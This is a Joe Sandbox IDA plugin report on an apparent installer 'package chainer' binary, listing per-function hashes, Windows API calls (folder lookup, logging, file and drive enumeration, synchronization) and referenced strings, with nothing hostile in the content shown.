Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 404b91de906de57deebeb3c099cbcdd428d856d0c19ab2306b71e38f599041bf
Instruction ID: 87b53a31d08f99ea3efcdd362daeaeecbbbe435fb35fd566be1723b76642ea20
Opcode Fuzzy Hash: 404b91de906de57deebeb3c099cbcdd428d856d0c19ab2306b71e38f599041bf
Instruction Fuzzy Hash: 77B0129137C200AD3104A1886D03C37010CC1C2F10330D91BF40DC1244F4A45CF20532

Function 00279848 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 6e156989a856fffb4a78f7662319947440c19fa63ca060e6c46aaab2eadce794
Instruction ID: ea3c5f8b6116ec70f89c22eb8c5bfe729a9f9e456393ec6af1cd997352a7d16b
Opcode Fuzzy Hash: 6e156989a856fffb4a78f7662319947440c19fa63ca060e6c46aaab2eadce794
Instruction Fuzzy Hash: 51B0129167C300AD3104A2882C03C37014CC1C2F20330DA1BF40DC1240F4A45CF10532

Function 00279861 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 9a2307003bd16b0564650746e95a4b8e25a60acd902609fec065b6d9da0928dd
Instruction ID: 6950584f5f57df32f90ef9c59ef82e4a149c4ed4b4c24585817db9a18565bd93
Opcode Fuzzy Hash: 9a2307003bd16b0564650746e95a4b8e25a60acd902609fec065b6d9da0928dd
Instruction Fuzzy Hash: 92A001A66BD206BD3508A2956D47C3B021CC5D6F65330DA1BF50A85191A8A06CE65836

Function 00279857 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 1bbb7dba58e8860fc57b5fbbb995b72f4fecc381357a3e1f1c66d0df76355c12
Instruction ID: 6950584f5f57df32f90ef9c59ef82e4a149c4ed4b4c24585817db9a18565bd93
Opcode Fuzzy Hash: 1bbb7dba58e8860fc57b5fbbb995b72f4fecc381357a3e1f1c66d0df76355c12
Instruction Fuzzy Hash: 92A001A66BD206BD3508A2956D47C3B021CC5D6F65330DA1BF50A85191A8A06CE65836

Function 002798A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7f96126fefd026ff81e36169e6e1d19aca2f58e8c67ff8f3224797486d71f647
Instruction ID: 6950584f5f57df32f90ef9c59ef82e4a149c4ed4b4c24585817db9a18565bd93
Opcode Fuzzy Hash: 7f96126fefd026ff81e36169e6e1d19aca2f58e8c67ff8f3224797486d71f647
Instruction Fuzzy Hash: 92A001A66BD206BD3508A2956D47C3B021CC5D6F65330DA1BF50A85191A8A06CE65836

Function 00279893 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a65d4ea83b1d4091454f976fe6981941702bebf20b936acbd4330d62de28dadd
Instruction ID: 6950584f5f57df32f90ef9c59ef82e4a149c4ed4b4c24585817db9a18565bd93
Opcode Fuzzy Hash: a65d4ea83b1d4091454f976fe6981941702bebf20b936acbd4330d62de28dadd
Instruction Fuzzy Hash: 92A001A66BD206BD3508A2956D47C3B021CC5D6F65330DA1BF50A85191A8A06CE65836

Function 0027989D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ff8a138d14229d2cabca229e2847f438678d2006a5e1a736270cad1bbf66fbe0
Instruction ID: 6950584f5f57df32f90ef9c59ef82e4a149c4ed4b4c24585817db9a18565bd93
Opcode Fuzzy Hash: ff8a138d14229d2cabca229e2847f438678d2006a5e1a736270cad1bbf66fbe0
Instruction Fuzzy Hash: 92A001A66BD206BD3508A2956D47C3B021CC5D6F65330DA1BF50A85191A8A06CE65836

Non-executed Functions

Function 0023F960 Relevance: 49.9, APIs: 11, Strings: 17, Instructions: 865libraryloaderCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,?,?,?,?,SystemFolder,0000000C), ref: 0023FB9E
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0023FD0F

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 0023FE29

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 0023FF47
GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 00240081
SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D), ref: 00240162
LoadLibraryW.KERNEL32(shfolder.dll), ref: 002401F0
GetProcAddress.KERNEL32(?,SHGetFolderPathW), ref: 00240222
GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00240400
SHGetPathFromIDListW.SHELL32(?,?), ref: 00240479
SHGetMalloc.SHELL32(00000000), ref: 00240492

Strings

AppDataFolder, xrefs: 00240371, 002403AB
SystemFolder, xrefs: 0023FAEF, 0023FB04, 0023FB0E
shfolder.dll, xrefs: 002401EB
Shlwapi.dll, xrefs: 0024025A
Shell32.dll, xrefs: 0024028A
ProgramFilesFolder, xrefs: 00240326
WindowsFolder, xrefs: 0023FD8E, 0023FDA3, 0023FDAD
ProgramFiles, xrefs: 0024035F
PROGRAMFILES, xrefs: 002403DD
ProgramW6432, xrefs: 0023F9F4
System32Folder, xrefs: 0023FC74, 0023FC89, 0023FC93
SETUPEXEDIR, xrefs: 0024002E
APPDATA, xrefs: 002403F7, 002403FF
TempFolder, xrefs: 0023FF72
SHGetFolderPathW, xrefs: 0024021C
ProgramFiles64Folder, xrefs: 0023F998
WindowsVolume, xrefs: 0023FEA8, 0023FEBD, 0023FEC7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Directory$FolderPathWindows$AddressEnvironmentFileFindFromHeapLibraryListLoadLocationMallocModuleNameProcProcessResourceSpecialSystemVariable
String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
API String ID: 700146523-2261365735
Opcode ID: 0f73e2efe6b8a8adbb5a16e83f00ceee65f07a35df80ec375e7644e94131878d
Instruction ID: c2ff9ab960ca625aa624629c440d30b8ea545972c98fec1809f5d9cfb876ff5f
Opcode Fuzzy Hash: 0f73e2efe6b8a8adbb5a16e83f00ceee65f07a35df80ec375e7644e94131878d
Instruction Fuzzy Hash: 16625B71A20216CBDB24DF24DC84BEAB3B2FF55704F1545A9D90ADB291EB31DDA1CB40

Function 00238550 Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 517fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(002D8B18,C0000000,00000003,00000000,00000004,00000080,00000000,4938EAB5,002D8AF4,002D8B0C,4938EAB5), ref: 002385D0
GetLastError.KERNEL32 ref: 002385ED
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00238666
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 0023876A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 002387DB
WriteFile.KERNEL32(00000000,002D88EC,00000000,000000FF,00000000,?,0000001C), ref: 0023880B
WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,002BC468,00000002), ref: 002388B6
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 002388BF
FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 00238810

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 002389B3
WriteFile.KERNEL32(00000000,00000000,00000002,00000000,00000000,?,0000001D), ref: 00238A39
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00238A44
WriteFile.KERNEL32(00000000,002382AD,000000FC,000000FF,00000000,002BC468,00000002,?,00000000,CPU: ,00000005), ref: 00238AB8
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00238AC1
WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,002BC468,00000002), ref: 00238B46
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00238B4F

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Strings

server, xrefs: 00238862, 0023886A
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 00238886
CPU: , xrefs: 00238907, 0023891D, 00238A4D
x64, xrefs: 00238850, 0023885C
LOGGER->Reusing LOG file at:, xrefs: 00238712, 00238724, 0023872E
LOGGER->Creating LOG file at:, xrefs: 0023895B, 0023896D, 00238977
workstation, xrefs: 0023885D
x86, xrefs: 00238847
LOGGER->failed to create LOG at:, xrefs: 00238621, 00238633, 0023863D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorFindHeapLastPointerProcessResource
String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
API String ID: 611875259-1312762833
Opcode ID: 281a4608a761dc2c4559c1e578dd5effc5b817ce8a09d5a5181266f09321ca08
Instruction ID: b4b9bf7cb91a6d000948581c915e98e268571284349d1980e6b53343be0bfc81
Opcode Fuzzy Hash: 281a4608a761dc2c4559c1e578dd5effc5b817ce8a09d5a5181266f09321ca08
Instruction Fuzzy Hash: C412AEB0A11206DFDB00DF68CC49BAABBB5EF45314F1482A9F815AB2A1EB70DD55CF50

Function 00277B30 Relevance: 32.6, APIs: 21, Instructions: 1121synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00277B8F
GetLastError.KERNEL32 ref: 00277B9A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00278310
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00278356
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0027849A
SetEvent.KERNEL32(?), ref: 00278514
GetLastError.KERNEL32 ref: 00278522
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00278882
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002788D6
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 002788EF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002788FA
EnterCriticalSection.KERNEL32(?), ref: 00278A14
LeaveCriticalSection.KERNEL32(?), ref: 00278A99
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00278B32
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00278B86
SetEvent.KERNEL32(?), ref: 00278C0D
GetLastError.KERNEL32 ref: 00278C21
SetEvent.KERNEL32(?), ref: 00278C32
GetLastError.KERNEL32 ref: 00278C42
SetEvent.KERNEL32(?), ref: 00278C74
GetLastError.KERNEL32 ref: 00278C82

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$ErrorLast$EnterEventLeave$ObjectSingleWait
String ID:
API String ID: 3699643388-0
Opcode ID: b137ae5aee61f45f1afc88ee9dc91d9e06bc594fe5c054ad05cbd9fa7d0f0163
Instruction ID: 15551997fa90875b28cef3b4df223405a5bf96ef33123dd66acd6a0dc8349c27
Opcode Fuzzy Hash: b137ae5aee61f45f1afc88ee9dc91d9e06bc594fe5c054ad05cbd9fa7d0f0163
Instruction Fuzzy Hash: EFB2C0B4A187428FD764CF29C584B5BFBE1BF88704F10892EE99993350DB70A855CF52

Function 00231920 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 376fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,?,?,?), ref: 0023197F
PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00231A37
FindFirstFileW.KERNEL32(?,00000000,*.*,00000000), ref: 00231B8B
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00231BA5
GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 00231BD8
FindClose.KERNEL32(00000000), ref: 00231C47
SetLastError.KERNEL32(0000007B), ref: 00231C55
_wcsrchr.LIBVCRUNTIME ref: 00231CAB
_wcsrchr.LIBVCRUNTIME ref: 00231CCB

Strings

\\?\, xrefs: 00231B21, 00231B76, 00231B7B
*.*, xrefs: 002319AA, 00231A07, 00231A08
\\?\UNC\, xrefs: 00231A57, 00231B0E

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FindPath$CloseFullName_wcsrchr$ErrorFileFirstLast
String ID: *.*$\\?\$\\?\UNC\
API String ID: 726989864-1700010636
Opcode ID: c608f30f36232e7055aaca25fc093c88c5253195d40bc2e752e383ce61c6667f
Instruction ID: 2bcdd2c1edec94abd2693aa4bc70054f24b7e0fe7173f55400ac7a946a5e66ce
Opcode Fuzzy Hash: c608f30f36232e7055aaca25fc093c88c5253195d40bc2e752e383ce61c6667f
Instruction Fuzzy Hash: CFD114B06206029FDB14DF68CC49BAAF7F6FF11315F108629E815DB2A0EB719934CB40

Function 00261680 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,FFFFFFFF,?), ref: 002616AD
GetProcessAffinityMask.KERNEL32(00000000), ref: 002616B4
GetSystemInfo.KERNEL32(?), ref: 00261735
GetModuleHandleA.KERNEL32 ref: 00261784
GetProcAddress.KERNEL32(00000000), ref: 0026178B
GlobalMemoryStatus.KERNEL32(?), ref: 002617DB

Strings

kernel32.dll, xrefs: 00261744
GlobalMemoryStatusEx, xrefs: 0026173F
, xrefs: 002617D2
@, xrefs: 0026177C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
String ID: $@$GlobalMemoryStatusEx$kernel32.dll
API String ID: 3120231856-802862622
Opcode ID: 1a4f4c3dc3b416638edec43fba4fcfe538232f82c8732152c0ed7d78f74fb0d3
Instruction ID: 6dccb135fc5df4010819c1fdcf1acfd57eca5eee256c094c4245497a4d7b38af
Opcode Fuzzy Hash: 1a4f4c3dc3b416638edec43fba4fcfe538232f82c8732152c0ed7d78f74fb0d3
Instruction Fuzzy Hash: 31718BB2A083018FD708CF19D88475AFBE6BBC8714F09892DE859C7340DBB4D854CB82

Function 00230620 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000060,4938EAB5,8007000E,00000000,?,?,?,?,?,?,?,?,002A1335,000000FF), ref: 002306A2
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,?,?,?,?,?,?,002A1335,000000FF), ref: 002306B1
FindResourceW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,002A1335,000000FF), ref: 002306CF
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,002A1335,000000FF), ref: 002306E7

Part of subcall function 0022E8F0: GetLastError.KERNEL32(4938EAB5,00000000,0029B9F0,000000FF,?,8007000E), ref: 0022E912

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,002A1335,000000FF), ref: 002307CA

Strings

Module, xrefs: 00230B17
REGISTRY, xrefs: 00230BC0, 00230C31
Module_Raw, xrefs: 00230B6C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID: Module$Module_Raw$REGISTRY
API String ID: 328770362-549000027
Opcode ID: 42cb0519b508f13c5d4026f9a957d6bf6d7d633d26790569e01f518ea7dbca2e
Instruction ID: 26a1aaa88402006bfe9e1984867e347a9691bc778a9cc49d1791e1977326f5b4
Opcode Fuzzy Hash: 42cb0519b508f13c5d4026f9a957d6bf6d7d633d26790569e01f518ea7dbca2e
Instruction Fuzzy Hash: 9A51C3B0921249EFDF20DF54D895BEEBBB4FF44710F108129E905A7290DB74AA218FB5

Function 002629E0 Relevance: 16.4, APIs: 6, Strings: 3, Instructions: 697fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?), ref: 00262DB4
CloseHandle.KERNEL32(00000000), ref: 00262DC6
GetLastError.KERNEL32 ref: 00262DD0
CloseHandle.KERNEL32(FFFFFFFF), ref: 00262E10

Strings

$, xrefs: 00263414
NUMBER_OF_PROCESSORS, xrefs: 00263078
\, xrefs: 00262AF7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CloseHandle$CreateErrorFileLast
String ID: $$NUMBER_OF_PROCESSORS$\
API String ID: 3884794734-458196154
Opcode ID: dc38e8b54a824c302f978f1a7546175f9b59c3335a9c6c5c1a5ad3b209d737ab
Instruction ID: 1f1961cd71ea03e559c56b7513242c475b1be540ea456ee564b1d1a429026b7e
Opcode Fuzzy Hash: dc38e8b54a824c302f978f1a7546175f9b59c3335a9c6c5c1a5ad3b209d737ab
Instruction Fuzzy Hash: E0724470910269DBDB21DF24CC44B9DBBF1BF09304F2482E9E489A7291DB75AE94DF90

Function 002533F0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 411COMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

_wcsrchr.LIBVCRUNTIME ref: 0025357D
_wcsrchr.LIBVCRUNTIME ref: 002535A5
GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 002535FE
GetDriveTypeW.KERNEL32(?), ref: 0025361A
Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 002536A1
Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00253901

Strings

!, xrefs: 002547E8, 0025493C
N+, xrefs: 002535C4
]%!, xrefs: 00253599

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
